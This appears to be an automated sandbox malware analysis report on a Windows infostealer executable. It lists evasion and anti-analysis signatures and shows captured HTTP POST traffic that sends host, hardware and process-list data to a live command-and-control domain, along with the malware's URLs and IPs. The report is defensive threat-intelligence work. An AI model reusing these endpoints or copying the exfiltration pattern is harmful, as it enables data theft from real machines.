Windows Analysis Report
Cc8zEnIDB2.exe

Overview

General Information

Sample name:Cc8zEnIDB2.exe
renamed because original name is a hash value
Original sample name:a0d6c9d4d75289ffa8f7dbda90e3fce6.exe
Analysis ID:1578071
MD5:a0d6c9d4d75289ffa8f7dbda90e3fce6
SHA1:3e3b99a9b625fbd216908a07754adab568dbef4d
SHA256:ca737deb8d7b8dc261e6dd95dd42d7316e670d886023a7e4369df4a518c972ce
Tags:exeuser-abuse_ch

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Cc8zEnIDB2.exe (PID: 7540 cmdline: "C:\Users\user\Desktop\Cc8zEnIDB2.exe" MD5: A0D6C9D4D75289FFA8F7DBDA90E3FCE6)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: Cc8zEnIDB2.exeAvira: detected
Source: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBFAvira URL Cloud: Label: malware
Source: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963Avira URL Cloud: Label: malware
Source: Cc8zEnIDB2.exeVirustotal: Detection: 52%
Source: Cc8zEnIDB2.exeReversingLabs: Detection: 44%
Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: Cc8zEnIDB2.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: -----BEGIN PUBLIC KEY-----0_2_004FDCF0
Source: Cc8zEnIDB2.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [ebp+04h], 424D53FFh0_2_0053A5B0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [edi+04h], 424D53FFh0_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [esi+04h], 424D53FFh0_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: mov dword ptr [ebx+04h], 424D53FFh0_2_0053B560
Source: Cc8zEnIDB2.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004D255D
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004D29FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 499218Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 33 36 31 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 
73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: Joe Sandbox ViewIP Address: 194.87.47.113 194.87.47.113
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0059A8C0 recvfrom,0_2_0059A8C0
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknownHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 499218Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 33 36 31 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 
65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: Cc8zEnIDB2.exe, 00000000.00000002.1396667628.0000000001885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: Cc8zEnIDB2.exe, 00000000.00000003.1385943438.0000000001882000.00000004.00000020.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1396667628.0000000001885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322963
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Cc8zEnIDB2.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: Cc8zEnIDB2.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: Cc8zEnIDB2.exe, Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: Cc8zEnIDB2.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703

System Summary

Source: Cc8zEnIDB2.exeStatic PE information: section name:
Source: Cc8zEnIDB2.exeStatic PE information: section name: .idata
Source: Cc8zEnIDB2.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004E05B00_2_004E05B0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004E6FA00_2_004E6FA0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0050F1000_2_0050F100
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0059B1800_2_0059B180
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0085E0300_2_0085E030
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_005A00E00_2_005A00E0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_005362100_2_00536210
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0059C3200_2_0059C320
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_005A04200_2_005A0420
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008244100_2_00824410
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004DE6200_2_004DE620
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008547800_2_00854780
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0059C7700_2_0059C770
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0053A7F00_2_0053A7F0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008367300_2_00836730
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004E49400_2_004E4940
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004DA9600_2_004DA960
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0058C9000_2_0058C900
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_006A6AC00_2_006A6AC0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0078AAC00_2_0078AAC0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00664B600_2_00664B60
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0078AB2C0_2_0078AB2C
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00848BF00_2_00848BF0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004DCBB00_2_004DCBB0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0085CC700_2_0085CC70
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0084CD800_2_0084CD80
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00854D400_2_00854D40
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00690D800_2_00690D80
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_007EAE300_2_007EAE30
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00822F900_2_00822F90
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004F4F700_2_004F4F70
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0059EF900_2_0059EF90
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00598F900_2_00598F90
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004E10E60_2_004E10E6
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_0083D4300_2_0083D430
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008435B00_2_008435B0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008617800_2_00861780
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_005898800_2_00589880
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_008299200_2_00829920
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00853A700_2_00853A70
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00841BD00_2_00841BD0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00511BE00_2_00511BE0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00837CC00_2_00837CC0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00789C800_2_00789C80
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004E5DB00_2_004E5DB0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004E3ED00_2_004E3ED0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004F5EB00_2_004F5EB0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_00859FE00_2_00859FE0
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004D75A0 appears 708 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 006ACBC0 appears 104 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 005150A0 appears 101 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 005B44A0 appears 76 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004DCAA0 appears 64 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004D71E0 appears 47 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 00514FD0 appears 289 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 00687220 appears 103 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004ECD40 appears 80 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 00515340 appears 48 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 00514F40 appears 343 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004ECCD0 appears 54 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004DC960 appears 37 times
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: String function: 004D73F0 appears 114 times
Source: Cc8zEnIDB2.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: Cc8zEnIDB2.exeStatic PE information: Section: sgmjipkl ZLIB complexity 0.994249163187446
Source: Cc8zEnIDB2.exeStatic PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004D255D
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004D29FF
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: Cc8zEnIDB2.exeVirustotal: Detection: 52%
Source: Cc8zEnIDB2.exeReversingLabs: Detection: 44%
Source: Cc8zEnIDB2.exeString found in binary or memory: bK62Xml2lldr548n8NfsjxaV4K8GfDrxFr2m+JvB/wu+H/AIk+HHwt0q80HRVbwb4Y8W+OvFHxL17TodQt9FtNT1WO+8ceMvEeu/addvNWvrZ9Saws7m30q2sbG29jIPBv6QeG4j4TxWJzV5bl+R8RZ/meLqYfOvrnNlmfw4kxkstoYXEYT6nXWUYrNMBlmWzxWHq0a+BhisXOjluIo4XDnDxP9I36JeL4a4+oYbh/+2cy4tlwdLDYTEcLwy2GHfC86e
Source: Cc8zEnIDB2.exeString found in binary or memory: lgnR3f/rnGfp3z/Tiom1SzT7tvO/8A10lPv2A/yfWj63T/AKZonVf/ADDvXbRC7G9P5f40bG9P5f41TOqNx5Vrbpz/AMtP33H5f0xVd9UunzmVE/7Zfr0/n/jU/Wf6/qJqsNinbWyfd/5JmiYJOyY/HOf0pPs77vr3kl8ishtQuXx/pMj/APbXp+tVJJ3c/M/0zj+oq/rj8vu/4BvTwlW99Vbd2/q/XotkdHttx964t0/7aZx+A/z9KgebTo/+Wsk2Ou
Source: Cc8zEnIDB2.exeString found in binary or memory: 42nk/EeWSp1sTkGe5xlkMTXyfO8fh8T+bWPv/575/pS/u/85qSo/wB3/nNf76+1/vfh/wAA/wCTQTP+2fyP+NMoooA9w/YN/a1/Z8+Cn7Wvwo+JPxN+IK+G/BPhaTx4Nd1tPC3jTXFsv7X+GnjTw7pxWw8OeHNX1S8W51jVdPtA1jZXKxi4FzMY7SOaeP8ApA/4fXf8Eyf+jl//ADDX7QP/AM6mv5If2bP2Svhp8e/2Lv22fjQus+Orf46fsu2fw98Ye
Source: Cc8zEnIDB2.exeString found in binary or memory: mh1a3V6fL/ADD2ns/z/wCD01/rsUPLf7iJvTyjxJH7j/P4fSopLdGELv8AP5kX72Tzf8nPYVo+X+72f+RM/jj/AD2560RxrJsjR4+Zf9XzPP8A/r+nbnpXP9ajSf72ce/xJb9767a/JeVl9YXl/X/bxg+T9xIZJN/XHH+fyqtNpqXEb74Y9/8AyyuPK8if26/59q9F0/wf4p1NkWx8LeJ7vzP9VJBo2qeQT1yD04HSvRNL/Z0+K2qIjf8ACLR2KSfuvM
